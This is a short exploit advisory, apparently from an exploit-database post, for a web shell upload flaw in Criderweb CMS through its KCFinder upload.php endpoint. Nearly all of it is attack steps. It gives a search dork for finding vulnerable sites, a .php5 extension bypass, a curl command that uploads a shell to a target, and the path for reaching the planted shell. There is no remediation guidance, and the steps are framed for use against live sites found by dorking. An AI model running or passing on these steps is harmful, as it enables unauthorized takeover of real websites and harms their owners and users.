Cms Criderweb Shell Upload Vulnerability
Tested On : Ubuntu 18.04
Author : security007
Platform : PHP
Software Download : http://www.criderweb.com/
Dork : intext:"Copyright © Criderweb"
Exploit : /kcfinder/upload.php
Access Shell Page : /userfiles/files/[yourshell.php5]
Bypass extension required : .php5
Poc :
1. dorking on search engines
2. Enter the exploit, for example --> http://vuln.com/kcfinder/upload.php
3. if the pop up "unknown error" means vuln
4. open your terminal type -> curl -F "file=@yourshell.php5" http://vuln.com/kcfinder/upload.php
5. Access your shell on -> http://vuln.com/userfiles/files/shell.php5
GREETS:
Allah, Problem Cyber Team, Indonesian People